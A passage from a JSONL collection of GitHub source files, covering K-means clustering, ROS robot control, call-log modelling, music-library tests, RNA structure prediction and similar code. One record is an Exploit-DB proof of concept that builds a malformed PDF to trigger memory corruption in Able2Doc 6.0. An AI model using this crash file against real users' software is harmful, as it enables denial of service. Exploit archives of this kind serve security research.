2] = 1\n        elif i < 130:\n            mat[i, 2] = 2\n        else:\n            mat[i, 2] = 3\n    # print(label)\n    #print(mat)\n    # Initialize the cluster centers\n    cluster_centers = gen_rand_ceter(data, length, k)\n    #print(cluster_centers)\n    sse_list = []\n    # Iterate\n    for i in range(iter_num):\n        print(\"iter: \", i)\n        # Compute Euclidean distances\n        for j in range(length):\n            min_dist = np.inf\n            min_index = -1\n            # Assign the point to the closest center\n            for l in range(k):\n                # Euclidean distance to center l\n                dist = np.sqrt(np.sum(np.power(cluster_centers[l, :] - data.iloc[j, :], 2)))\n                if dist < min_dist:\n                    min_dist = dist\n                    min_index = l + 1\n            # Record the assignment\n            mat[j, :] = min_dist, min_index, mat[j, 2]\n        #print(mat)\n        # Update the cluster centers\n        new_cluster_centers = np.zeros((k, data.shape[1]))\n        for j in range(k):\n            # New center = mean of the points assigned to cluster j\n            new_cluster_centers[j, :] = np.mean(data.iloc[np.nonzero(mat[:, 1].A == j + 1)[0]], axis=0)\n        # cluster_centers = new_cluster_centers\n        print(\"cluster_centers: \", cluster_centers)\n        sse = cal_sse(mat, length, k)\n        sse_list.append(sse)\n        if np.all(cluster_centers == new_cluster_centers):\n            break\n        else:\n            cluster_centers = new_cluster_centers\n    # Compute the SSE\n    sse = cal_sse(mat, length, k)\n    # Compute the accuracy\n    acc = gen_acc(mat, length, k)\n\n    # Plotting\n    X = 6 # total phenols\n    Y = 7 # flavonoids\n\n    plt.xlabel('特征7')\n    plt.ylabel('特征8')\n    plt.title('SSE=%.3f Acc=%.3f' % (sse, acc))\n    plt.axis([0, 1, 0, 1])\n    for i in range(length):\n        if int(mat[i, 1]) == 1:\n            plt.scatter(data.iloc[i, X], data.iloc[i, Y], c='r', marker='o')\n        elif int(mat[i, 1]) == 2:\n            plt.scatter(data.iloc[i, X], data.iloc[i, Y], c='g', marker='o')\n        else:\n            plt.scatter(data.iloc[i, X], data.iloc[i, Y], c='b', marker='o')\n    plt.savefig(os.path.join(img_dir, \"res.png\"))\n\n    # Plot the SSE over iterations\n    plt.figure()\n    plt.plot(range(len(sse_list)), sse_list)\n    plt.xlabel('iter')\n    plt.ylabel('sse')\n    plt.title('SSE')\n    plt.savefig(os.path.join(img_dir, \"sse.png\"))\n\n\n","repo_name":"shimmer147/BigDataAnylisis","sub_path":"Lab3Kmeans/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"32877513871","text":"from typing import *\n\n\nclass Solution:\n    def threeSumSmaller(self, nums: List[int], target: int) -> int:\n        nums.sort()\n        count = 0\n        for i in range(len(nums)):\n            count += self.search_pair(nums, target - nums[i], i)\n        return count\n\n    def search_pair(self, nums, target_sum, i):\n        count = 0\n        l, r = i + 1, len(nums) - 1\n        while l < r:\n            if nums[l] + nums[r] < target_sum:\n                count += r - l\n                l += 1\n            else:\n                r -= 1\n        return count\n","repo_name":"yeetcode0/yeetcode-ra","sub_path":"leetcode/00259-ThreeSumSmaller/cheok.py","file_name":"cheok.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"36225851193","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport rospy, time\nfrom sensor_msgs.msg import Joy\nfrom geometry_msgs.msg import Twist\nfrom std_msgs.msg import String\n\nclass JoyLed():\n    def __init__(self):\n        self._joy_sub = rospy.Subscriber(\"/joy\", Joy, self.joy_callback, queue_size=1)\n        self._vel_pub = rospy.Publisher(\"/cmd_vel\", Twist, queue_size=1)\n        self._led_pub = rospy.Publisher(\"/cmd_led\", String, queue_size=1)\n        self.set_led(\"0\")\n        self.set_vel(0.0, 0.0)\n\n    def set_vel(self, vx, vth):\n        twist = Twist()\n        twist.linear.x = vx\n        twist.angular.z = vth\n\n        self._vel_pub.publish(twist)\n        del twist\n\n    def set_led(self, msg):\n        message = msg \n        self._led_pub.publish(message)\n\n        del message\n\n    def joy_callback(self, joy_msg):\n        if joy_msg.buttons[2] == 1:\n            msg = str(1)\n            self.set_led(msg)\n        \n        elif joy_msg.buttons[0] == 1:\n            vx = joy_msg.axes[7] * 0.3\n            vth = joy_msg.axes[6] * 3.14 / 4\n            self.set_vel(vx, vth)\n\n        else :\n            msg = str(0)\n            vx = joy_msg.axes[7] * 0.0\n            vth = joy_msg.axes[6] * 0.0\n\n            self.set_led(msg)\n            self.set_vel(vx, vth)\n        \n\nif __name__ == \"__main__\":\n    rospy.init_node(\"ps4_controller\")\n    led_on_off = JoyLed()\n    rospy.spin()","repo_name":"study928/agv_common","sub_path":"agv_control/script/ps4_controller.py","file_name":"ps4_controller.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"8597361357","text":"from __future__ import annotations\n\nimport 
logging\nfrom collections import defaultdict\nfrom dataclasses import dataclass, field\nfrom datetime import datetime\nfrom typing import DefaultDict, Literal\n\nfrom wazo_call_logd.database.models import CallLog, CallLogParticipant\nfrom wazo_call_logd.exceptions import InvalidCallLogException\nfrom wazo_call_logd.extension_filter import DEFAULT_HIDDEN_EXTENSIONS, ExtensionFilter\n\nlogger = logging.getLogger(__name__)\n\n\n@dataclass\nclass BridgeInfo:\n    id: str\n    technology: str\n    channels: set[str] = field(default_factory=set)\n\n\nclass RawCallLog:\n    def __init__(self):\n        self.date: datetime | None = None\n        self.date_end: datetime | None = None\n        self.source_name: str | None = None\n        self.source_exten: str | None = None\n        self.source_internal_exten: str | None = None\n        self.source_internal_context: str | None = None\n        self.source_internal_name: str | None = None\n        self.requested_name: str | None = None\n        self.requested_exten: str | None = None\n        self.requested_context: str | None = None\n        self.requested_internal_exten: str | None = None\n        self.requested_internal_context: str | None = None\n        self.destination_name: str | None = None\n        self.destination_exten: str | None = None\n        self.destination_internal_exten: str | None = None\n        self.destination_internal_context: str | None = None\n        self.destination_line_identity: str | None = None\n        self.user_field: str | None = None\n        self.date_answer: datetime | None = None\n        self.source_line_identity: str | None = None\n        self.direction: Literal['source', 'destination', 'internal'] = 'internal'\n        self.raw_participants: DefaultDict[str, dict] = defaultdict(dict)\n        self.participants_info: list[dict] = []\n        self.participants: list[CallLogParticipant] = []\n        self.recordings: list = []\n        self.cel_ids: list[int] = []\n        self.interpret_callee_bridge_enter: bool = True\n        self.interpret_caller_xivo_user_fwd: bool = True\n        self._tenant_uuid: str = None  # type: ignore[assignment]\n        self.pending_wait_for_mobile_peers: set[str] = set()\n        self.caller_id_by_channels: dict[str, str] = {}\n        self.extension_filter: ExtensionFilter = ExtensionFilter(\n            DEFAULT_HIDDEN_EXTENSIONS\n        )\n        self.bridges: dict[str, BridgeInfo] | None = {}\n        self.destination_details: list = []\n\n    @property\n    def tenant_uuid(self) -> str:\n        return self._tenant_uuid\n\n    def set_tenant_uuid(self, tenant_uuid):\n        if self._tenant_uuid is None:\n            self._tenant_uuid = str(tenant_uuid)\n        elif self._tenant_uuid != tenant_uuid:\n            logger.error(\n                \"We got a cel with an unexpected tenant_uuid: \" \"%s instead of %s\",\n                tenant_uuid,\n                self._tenant_uuid,\n            )\n\n    def to_call_log(self) -> CallLog:\n        if not self.date:\n            raise InvalidCallLogException('date not found')\n        if not (self.source_name or self.source_exten):\n            raise InvalidCallLogException('source name and exten not found')\n\n        result = CallLog(\n            tenant_uuid=self._tenant_uuid,\n            date=self.date,\n            date_answer=self.date_answer,\n            date_end=self.date_end,\n            source_name=self.source_name,\n            source_exten=self.source_exten,\n            source_internal_exten=self.source_internal_exten,\n            source_internal_context=self.source_internal_context,\n            source_internal_name=self.source_internal_name,\n            requested_exten=self.requested_exten,\n            requested_context=self.requested_context,\n            requested_internal_exten=self.requested_internal_exten,\n            requested_internal_context=self.requested_internal_context,\n            requested_name=self.requested_name,\n            destination_name=self.destination_name,\n            destination_exten=self.destination_exten,\n            
destination_internal_exten=self.destination_internal_exten,\n destination_internal_context=self.destination_internal_context,\n destination_line_identity=self.destination_line_identity,\n user_field=self.user_field,\n source_line_identity=self.source_line_identity,\n direction=self.direction,\n destination_details=self.destination_details,\n )\n result.participants = self.participants\n result.cel_ids = self.cel_ids\n result.recordings = self.recordings\n\n return result\n","repo_name":"wazo-platform/wazo-call-logd","sub_path":"wazo_call_logd/raw_call_log.py","file_name":"raw_call_log.py","file_ext":"py","file_size_in_byte":4612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74482902771","text":"import numpy as np\n\n\nclass Box:\n \"\"\"Holds all the information for the Box.\n\n Parameters\n ----------\n box_dims : np.array\n The dimensional lengths of the box, should be a numpy array ([x, y, z]).\n With shape (1, 3).\n\n Returns\n -------\n self : Box\n Returns an instance of itself.\n \n Attributes\n ----------\n box_dims : np.array\n The dimensional lengths of the box, should be a numpy array ([x, y, z]).\n \"\"\"\n def __init__(self, box_dims):\n self.box_dims = box_dims\n\n @property\n def volume(self):\n \"\"\"Calculate the box volume\n\n Returns\n -------\n box volume : float\n Computed box volume\n \"\"\"\n return np.prod(self.box_dims)\n\n def wrap(self, coordinates):\n \"\"\"Wraps the coordinates within the box dimensions\n\n Parameters\n ----------\n coordinates : np.array\n Array of the atomic coordinates.\n\n Returns\n -------\n coordinates : np.array\n Arrays of the wrapped atomic coordinates.\n \"\"\"\n if len(coordinates.shape) == 1:\n coordinates -= self.box_dims * \\\n np.round(coordinates / self.box_dims)\n else:\n coordinates -= self.box_dims[np.newaxis, :] * \\\n np.round(coordinates / self.box_dims[np.newaxis, :])\n return coordinates\n\n def minimum_image_distance(self, index, coordinates):\n \"\"\"Calculate the minimum distance between two atoms.\n\n Parameters\n ----------\n index : int\n index of the particle to take the minimum images for\n\n coordinates : np.array\n Array of the atomic xyz coordinate for all particles.\n\n Returns\n -------\n coord_ij2 : np.array\n Array of the distances between each i-th particle and remaining\n particles\n \"\"\"\n if index != 0 and index != len(coordinates):\n coord_ij = coordinates[index, :] - coordinates[:index, :]\n temp = coordinates[index, :] - coordinates[index + 1:, :]\n coord_ij = np.concatenate((coord_ij, temp))\n elif index == len(coordinates):\n coord_ij = coordinates[index, :] - coordinates[:index, :]\n elif index == 0:\n coord_ij = coordinates[index, :] - coordinates[index + 1:, :]\n \n coord_ij = coord_ij - \\\n self.box_dims[np.newaxis, :] * \\\n np.round(coord_ij / self.box_dims[np.newaxis, :])\n coord_ij2 = np.sum(np.square(coord_ij), axis=1)\n return coord_ij2\n","repo_name":"bdnguye2/2019_molSSI_summer","sub_path":"monte_carlo/mcpy/box.py","file_name":"box.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74991411571","text":"from quodlibet.browsers.covergrid.main import CoverGrid\nfrom senf import fsnative\n\nfrom . 
import TestCase, run_gtk_loop\nfrom .helper import realized\n\nfrom quodlibet import config\n\nfrom quodlibet.browsers.albums.prefs import DEFAULT_PATTERN_TEXT\nfrom quodlibet.formats import AudioFile\nfrom quodlibet.library import SongLibrary, SongLibrarian\n\n\nSONGS = [\n AudioFile({\n \"album\": \"one\",\n \"artist\": \"piman\",\n \"~filename\": fsnative(u\"/dev/null\"),\n }),\n AudioFile({\n \"album\": \"two\",\n \"artist\": \"mu\",\n \"~filename\": fsnative(u\"/dev/zero\"),\n }),\n AudioFile({\n \"album\": \"three\",\n \"artist\": \"boris\",\n \"~filename\": fsnative(u\"/bin/ls\"),\n }),\n AudioFile({\n \"album\": \"three\",\n \"artist\": \"boris\",\n \"~filename\": fsnative(u\"/bin/ls2\"),\n }),\n]\nSONGS.sort()\n\n\nclass TCoverGridBrowser(TestCase):\n\n def setUp(self):\n config.init()\n\n library = SongLibrary()\n library.librarian = SongLibrarian()\n CoverGrid.init(library)\n\n for af in SONGS:\n af.sanitize()\n library.add(SONGS)\n\n self.bar = CoverGrid(library)\n\n self._id = self.bar.connect(\"songs-selected\", self._selected)\n self._id2 = self.bar.connect(\"songs-activated\", self._activated)\n with realized(self.bar):\n self.bar.filter_text(\"\")\n self._wait()\n self.songs = []\n self.activated = False\n\n def tearDown(self):\n self.bar.disconnect(self._id)\n self.bar.disconnect(self._id2)\n self.bar.destroy()\n del self.bar\n config.quit()\n\n def _activated(self, albumlist):\n self.activated = True\n\n def _selected(self, albumlist, songs, *args):\n self.songs = songs\n\n def _wait(self):\n run_gtk_loop()\n\n def test_activated(self):\n with realized(self.bar):\n view = self.bar.view\n child = view.get_child_at_index(0)\n child.emit(\"activate\")\n self._wait()\n self.failUnless(self.activated)\n\n def test_can_filter(self):\n with realized(self.bar):\n self.failUnless(self.bar.can_filter(None))\n self.failUnless(self.bar.can_filter(\"album\"))\n self.failUnless(self.bar.can_filter(\"foobar\"))\n self.failIf(self.bar.can_filter(\"~#length\"))\n self.failIf(self.bar.can_filter(\"title\"))\n\n def test_set_text(self):\n with realized(self.bar):\n self.bar.filter_text(\"artist=piman\")\n self._wait()\n self.failUnlessEqual(len(self.songs), 1)\n self.bar.filter_text(\"\")\n self._wait()\n self.failUnlessEqual(set(self.songs), set(SONGS))\n\n def test_filter_album(self):\n with realized(self.bar):\n self.bar.filter_text(\"dsagfsag\")\n self._wait()\n self.failUnlessEqual(len(self.songs), 0)\n self.bar.filter_text(\"\")\n self._wait()\n self.bar.filter(\"album\", [\"one\", \"three\"])\n self._wait()\n self.failUnlessEqual(len(self.songs), 3)\n\n def test_filter_artist(self):\n with realized(self.bar):\n self.bar.filter(\"artist\", [\"piman\"])\n self._wait()\n self.failUnlessEqual(len(self.songs), 1)\n self.failUnlessEqual(self.songs[0](\"artist\"), \"piman\")\n\n def test_header(self):\n self.failIf(self.bar.headers)\n\n def test_list(self):\n albums = self.bar.list_albums()\n self.failUnlessEqual(set(albums), {s.album_key for s in SONGS})\n self.bar.filter_albums([SONGS[0].album_key])\n self._wait()\n self.failUnlessEqual({s.album_key for s in self.songs},\n {SONGS[0].album_key})\n\n def test_active_filter(self):\n with realized(self.bar):\n self.bar.filter(\"artist\", [\"piman\"])\n self._wait()\n self.failUnless(self.bar.active_filter(self.songs[0]))\n for s in SONGS:\n if s is not self.songs[0]:\n self.failIf(self.bar.active_filter(s))\n\n def test_default_display_pattern(self):\n pattern_text = self.bar.display_pattern_text\n self.failUnlessEqual(pattern_text, 
DEFAULT_PATTERN_TEXT)\n self.failUnless(\"\" in pattern_text)\n","repo_name":"quodlibet/quodlibet","sub_path":"tests/test_browsers_covergrid.py","file_name":"test_browsers_covergrid.py","file_ext":"py","file_size_in_byte":4315,"program_lang":"python","lang":"en","doc_type":"code","stars":1306,"dataset":"github-code","pt":"21"} +{"seq_id":"73027336693","text":"import io\nimport os\nfrom setuptools import setup\nimport sys\n\n\n# pip workaround\nos.chdir(os.path.abspath(os.path.dirname(__file__)))\n\n\n# MacOS .app with py2app\nif sys.platform == 'darwin':\n extra_options = dict(\n setup_requires=['py2app'],\n app=['reprounzip_qt/main.py'],\n options=dict(py2app=dict(argv_emulation=True)))\nelse:\n extra_options = {}\n\n\n# Need to specify encoding for PY3, which has the worst unicode handling ever\nwith io.open('README.rst', encoding='utf-8') as fp:\n description = fp.read()\nsetup(name='reprounzip-qt',\n version='0.2',\n packages=['reprounzip_qt', 'reprounzip_qt.gui'],\n entry_points={\n 'gui_scripts': [\n 'reprounzip-qt = reprounzip_qt.main:main']},\n install_requires=['PyYAML'],\n description=\"Graphical user interface for reprounzip, using Qt\",\n author=\"Remi Rampin, Fernando Chirigati, Dennis Shasha, Juliana Freire\",\n author_email='reprozip-users@vgc.poly.edu',\n maintainer=\"Remi Rampin\",\n maintainer_email='remirampin@gmail.com',\n url='http://vida-nyu.github.io/reprozip/',\n long_description=description,\n license='BSD-3-Clause',\n keywords=['reprozip', 'reprounzip', 'reproducibility', 'provenance',\n 'vida', 'nyu', 'gui'],\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: X11 Applications :: Qt',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: BSD License',\n 'Programming Language :: Python :: 2.7',\n 'Topic :: Scientific/Engineering',\n 'Topic :: System :: Archiving'],\n **extra_options)\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/ViDA-NYU_reprozip/reprozip-master/reprounzip-qt/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"4003344478","text":"#!/usr/bin/python\n\n# Imports\nimport sys, os, re, time\nimport argparse\nimport pdb\nimport pickle\nfrom itertools import *\n# Science\nimport numpy as np\nimport scipy.stats as stats\nimport pandas as pd\n# Plotting\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\n\n# Import mixture models\nfrom MixtureModel_multipleDataSources import *\n\n########### LOAD patients of interest\nq_ids_name='q_ids_njdm'\nmain_result_dir='../results'\nselected_participants_dir='../data/{}/selected_participants'.format(q_ids_name)\n\n# Load list of selected participant ids\nwith open('{}/selected_pid'.format(selected_participants_dir),'r') as f:\n selected_pid=np.loadtxt(f,dtype=int)\n \n# Load expert grouping\nexpert_grouping_dir='{}/expert_groupings'.format(selected_participants_dir)\nexpert_file='expert_1'\nwith open('{}/{}'.format(expert_grouping_dir,expert_file),'r') as f:\n # p_idxs to group\n expert_grouping={selected_pid[int(p_idx)]:group for (group,line) in enumerate(f.read().splitlines()) for p_idx in line.split(',')}\n \n# Expert groups\ngroups=np.unique(np.array([val for val in expert_grouping.values()]))\n# Expert \"posterior\"\nexpert_posterior=np.zeros((selected_pid.size, groups.size))\nfor (p_idx,p_id) in enumerate(selected_pid):\n expert_posterior[p_idx,expert_grouping[p_id]]=1.\n\n# Plot heatmap for selected\nfig, ax = 
plt.subplots(1)\ncmap=plt.pcolormesh(expert_posterior, cmap='inferno', vmin=0., vmax=1.)\nfig.colorbar(cmap)\n# Put the major ticks at the middle of each cell\nk=groups\nax.set_xticks(k+ 0.5, minor=False)\n# X labels are phenotype number\nax.set_xticklabels(k, minor=False)\nplt.xlabel('k')\nplt.ylabel('p_id')\nplt.savefig('../data/{}/selected_participants/expert_groupings/selected_pid_posterior_{}.pdf'.format(q_ids_name, expert_file), format='pdf', bbox_inches='tight')\nplt.close()\n\n########### Selected participant clusterings\n# From what simulation\nq_ids_name='q_ids_njdm'\nK=4\nalpha=0.001\nbeta=0.001\nR=5\nr=1\n\n# Result dir\nresult_dir='../results/{}/infer_MixtureModel_multipleDataSources/online/K_{}/alpha_{}/beta_{}/R_{}/r_{}'.format(q_ids_name, K, alpha, beta, R,r)\n \nif os.path.exists(result_dir+'/mixtureModel.pickle'):\n # Load model\n with open('{}/mixtureModel.pickle'.format(result_dir), 'rb') as f:\n inferredModel=pickle.load(f)\n \n # Topics per patient heatmap\n N_sk=np.zeros((inferredModel.S, inferredModel.K))\n # Iterate over sets for plotting\n for s in np.arange(inferredModel.S):\n k_Z, count_K=np.unique(inferredModel.Z[s,~np.isnan(inferredModel.Z[s,:])], return_counts=True)\n N_sk[s,k_Z.astype(int)]=count_K\n\n # Empirical posterior\n emp_posterior=N_sk/N_sk.sum(axis=1, keepdims=True) \n \n ############## K Vs K ################### \n # Hard assignments\n hard_cluster_assignment=emp_posterior.argmax(axis=1)\n # Confusion matrix\n conf_matrix=np.zeros((K,groups.size))\n for p_id in selected_pid:\n conf_matrix[hard_cluster_assignment[p_id],expert_grouping[p_id]]+=1\n \n # Purity\n purity=np.max(conf_matrix, axis=1).sum()/selected_pid.size\n # Normalized mutual information\n mi_tmp=conf_matrix/selected_pid.size*np.log((conf_matrix*selected_pid.size)/(conf_matrix.sum(axis=0,keepdims=True)*conf_matrix.sum(axis=1,keepdims=True)))\n mi_tmp[conf_matrix==0]=0.\n mi=np.sum(mi_tmp)\n h_c=-np.sum(conf_matrix.sum(axis=0,keepdims=True)/selected_pid.size*np.log(conf_matrix.sum(axis=0,keepdims=True)/selected_pid.size))\n h_g=-np.sum(conf_matrix.sum(axis=1,keepdims=True)/selected_pid.size*np.log(conf_matrix.sum(axis=1,keepdims=True)/selected_pid.size))\n nmi=mi/(h_c+h_g)/2\n \n ############## Severity yes/no ################### \n # Confusion matrix\n sev_conf_matrix=np.zeros((2,2))\n sev_conf_matrix[0,0]=conf_matrix[0,0].sum()\n sev_conf_matrix[0,1]=conf_matrix[0,1:].sum()\n sev_conf_matrix[1,0]=conf_matrix[1:K,0].sum()\n sev_conf_matrix[1,1]=conf_matrix[1:K,1:].sum()\n \n # Purity\n sev_purity=np.max(sev_conf_matrix, axis=1).sum()/selected_pid.size\n # Normalized mutual information\n mi_tmp=sev_conf_matrix/selected_pid.size*np.log((sev_conf_matrix*selected_pid.size)/(sev_conf_matrix.sum(axis=0,keepdims=True)*sev_conf_matrix.sum(axis=1,keepdims=True)))\n mi_tmp[sev_conf_matrix==0]=0.\n sev_mi=np.sum(mi_tmp)\n h_c=-np.sum(sev_conf_matrix.sum(axis=0,keepdims=True)/selected_pid.size*np.log(sev_conf_matrix.sum(axis=0,keepdims=True)/selected_pid.size))\n h_g=-np.sum(sev_conf_matrix.sum(axis=1,keepdims=True)/selected_pid.size*np.log(sev_conf_matrix.sum(axis=1,keepdims=True)/selected_pid.size))\n sev_nmi=sev_mi/(h_c+h_g)/2\n ############## Mild yes/no ################### \n # Confusion matrix\n not_mild_index_K=np.setdiff1d(np.arange(K),[1])\n not_mild_index_groups=np.setdiff1d(np.arange(groups.size),[1])\n mild_conf_matrix=np.zeros((2,2))\n mild_conf_matrix[0,0]=conf_matrix[1,1].sum()\n mild_conf_matrix[0,1]=conf_matrix[1,not_mild_index_groups].sum()\n 
mild_conf_matrix[1,0]=conf_matrix[not_mild_index_K,1].sum()\n mild_conf_matrix[1,1]=conf_matrix[np.ix_(not_mild_index_K,not_mild_index_groups)].sum()\n \n # Purity\n mild_purity=np.max(mild_conf_matrix, axis=1).sum()/selected_pid.size\n # Normalized mutual information\n mi_tmp=mild_conf_matrix/selected_pid.size*np.log((mild_conf_matrix*selected_pid.size)/(mild_conf_matrix.sum(axis=0,keepdims=True)*mild_conf_matrix.sum(axis=1,keepdims=True)))\n mi_tmp[mild_conf_matrix==0]=0.\n mild_mi=np.sum(mi_tmp)\n h_c=-np.sum(mild_conf_matrix.sum(axis=0,keepdims=True)/selected_pid.size*np.log(mild_conf_matrix.sum(axis=0,keepdims=True)/selected_pid.size))\n h_g=-np.sum(mild_conf_matrix.sum(axis=1,keepdims=True)/selected_pid.size*np.log(mild_conf_matrix.sum(axis=1,keepdims=True)/selected_pid.size))\n mild_nmi=mild_mi/(h_c+h_g)/2\n print('##############################')\n print('K={}, alpha={}, beta={}, r={}:'.format(K,alpha,beta,r))\n print('##############################')\n print('Confusion matrix')\n print('{}'.format(conf_matrix))\n print('purity={}/nmi={}'.format(purity,nmi))\n print('##############################')\n print('Severity Confusion matrix')\n print('{}'.format(sev_conf_matrix))\n print('sev_purity={}/sev_nmi={}'.format(sev_purity,sev_nmi))\n print('##############################')\n print('##############################')\n print('Mild Confusion matrix')\n print('{}'.format(mild_conf_matrix))\n print('mild_purity={}/mild_nmi={}'.format(mild_purity,mild_nmi))\n print('##############################')\n print('')\n\n","repo_name":"iurteaga/phendo","sub_path":"src/eval_selected_participants.py","file_name":"eval_selected_participants.py","file_ext":"py","file_size_in_byte":6910,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"32572067058","text":"# Exploit Title: Able2Doc and Able2Doc Professional v 6.0 memory corruption\n# Date: June 24 2012\n# Exploit Author: Carlos Mario Penagos Hollmann\n# Vendor Homepage: www.investintech.com\n# Version:6.0\n# Tested on: Windows 7\n# CVE : cve-2011-4221\n\n\npayload =\"B\"*13000\ncrash=\"startxref\"\npdf=payload+crash\n\nfilename = \"slimpdPoC.pdf\"\nfile = open(filename,\"w\")\nfile.writelines(pdf)\nfile.close()","repo_name":"ryanmrestivo/red-team","sub_path":"_Resources/Exploit DB 2021-12-11/exploits/windows/dos/19393.py","file_name":"19393.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"8548169506","text":"# coding: utf-8\n\nimport sys\n\nimport pefile\n\ntry:\n import cppmangle\n cppmangle_available = True\nexcept ImportError:\n cppmangle_available = False\n\n\ndef dump_symbols(dll: str):\n pe = pefile.PE(dll)\n try:\n export_dir_data = pe.DIRECTORY_ENTRY_EXPORT\n except AttributeError:\n print('DIRECTORY_ENTRY_EXPORT not found.')\n return\n\n symbols = export_dir_data.symbols\n mangled_symbols = [\n symbol.name.decode('ascii') for symbol in symbols if symbol.name\n ]\n\n if cppmangle_available:\n demangle = lambda sym: cppmangle.cdecl_sym(cppmangle.demangle(sym))\n\n for symbol in mangled_symbols:\n try:\n print(symbol, '->', demangle(symbol))\n except:\n print(symbol)\n else:\n for symbol in mangled_symbols:\n print(symbol)\n\n\ndef main():\n if len(sys.argv) < 2:\n print('DLL path missing.')\n return\n\n dump_symbols(sys.argv[1])\n\n\nif __name__ == '__main__':\n main()\n\n# References:\n# ../cppmangle/dump_dll_exports.py\n# ../parse/dump_dll_exports.py\n# 
https://github.com/erocarrera/pefile/blob/e3514208aa120200ca689c85a23e05f19233a503/pefile.py#L7415-L7433\n","repo_name":"myd7349/Ongoing-Study","sub_path":"python/pefile/dump_dll_exports.py","file_name":"dump_dll_exports.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"21"}
+{"seq_id":"29939183910","text":"'''\n1295. Find Numbers with Even Number of Digits\nGiven an array nums of integers, return how many of them contain an even number of digits.\n'''\nimport math\ndef findNumbers(nums):\n    count = 0\n    for num in nums:\n        # digit count of num = int(math.log10(num)) + 1\n        if (int(math.log10(num)) + 1) % 2 == 0:\n            count+=1\n    return count\n\nprint(findNumbers([12, 345, 2, 6, 7896])) # example input: 12 and 7896 have an even digit count, so this prints 2\n\n\n\n    # def even(num):\n    #     count = 0\n    #     while num>0:\n    #         count+=1\n    #         num = int(num/10)\n    #     return count\n# import math\n# num = 123456456456\n# print(int(math.log10(num)+1))","repo_name":"haseeb-kp/DSA","sub_path":"leetcode/even_digit.py","file_name":"even_digit.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"33845445981","text":"import numpy as np\nimport argparse, sys\nfrom arnie.mea.mea_utils import *\nfrom copy import copy\n\nclass MEA:\n    def __init__(self, bpps, gamma = 1.0, debug=False, run_probknot_heuristic = False, theta=0, stochastic=False):\n        self.debug = debug\n        self.bpps = bpps\n        self.N=self.bpps.shape[0]\n        self.gamma = gamma\n        self.theta = theta\n        self.W = np.zeros([self.N,self.N])\n        self.MEA_bp_list = []\n        self.structure = ['.']*self.N\n        self.MEA_bp_matrix = np.zeros([self.N, self.N])\n        self.tb = np.zeros([self.N, self.N])\n        self.min_hp_length = 3\n        self.evaluated = False\n        self.stochastic = stochastic\n\n        if run_probknot_heuristic:\n            self.run_ProbKnot()\n        else:\n            self.run_MEA()\n    \n    def fill_W(self, i, j):\n        if self.stochastic:\n            options = [self.W[i+1, j], self.W[i, j-1],\\\n            (self.gamma+1)*self.bpps[i,j] + self.W[i+1, j-1] - 1,\\\n            np.max([self.W[i,k] + self.W[k+1, j] for k in range(i+1,j)])]\n            option_wts = options - np.min(options)\n            option_wts /= np.sum(option_wts)\n            selection = np.random.choice([0,1,2,3],p=option_wts)\n            self.W[i,j] = options[selection]\n            self.tb[i,j] = selection #0: 5' pass, 1: 3' pass, 2: bp, 3: multiloop\n\n        else:\n            options = [self.W[i+1, j], self.W[i, j-1],\\\n            (self.gamma+1)*self.bpps[i,j] + self.W[i+1, j-1] - 1,\\\n            np.max([self.W[i,k] + self.W[k+1, j] for k in range(i+1,j)])]\n            self.W[i,j] = np.max(options) \n            self.tb[i,j] = np.argmax(options) #0: 5' pass, 1: 3' pass, 2: bp, 3: multiloop\n    \n    def run_MEA(self):\n        # fill weight matrix\n        for length in range(self.min_hp_length, self.N):\n            for i in range(self.N-length):\n                j = i + length\n                self.fill_W(i,j)\n        \n        self.traceback(0,self.N-1)\n        \n        for x in self.MEA_bp_list:\n            self.MEA_bp_matrix[x[0],x[1]]=1\n            self.structure[x[0]]='('\n            self.structure[x[1]]=')'\n        \n        self.structure = ''.join(self.structure)\n        if not self.evaluated: self.evaluated = True\n\n    def run_ProbKnot(self):\n\n        #Threshknot step: filter out bps below cutoff theta\n        threshknot_filter = np.where(self.bpps <= self.theta)\n        filtered_bpps = copy(self.bpps)\n        filtered_bpps[threshknot_filter] = 0\n\n        output = np.zeros([self.N, self.N])\n        \n        # ProbKnot heuristic part 1: get all base pairs where p(ij) == p_max(i)\n        output[np.where(self.bpps == np.max(self.bpps, axis=0))] = 1\n        \n        # ProbKnot heuristic part 2: get all base pairs where p(ij) == p_max(j)\n        self.MEA_bp_matrix = np.clip(output+np.transpose(output)-1,0,1)\n\n        for [i, j] in 
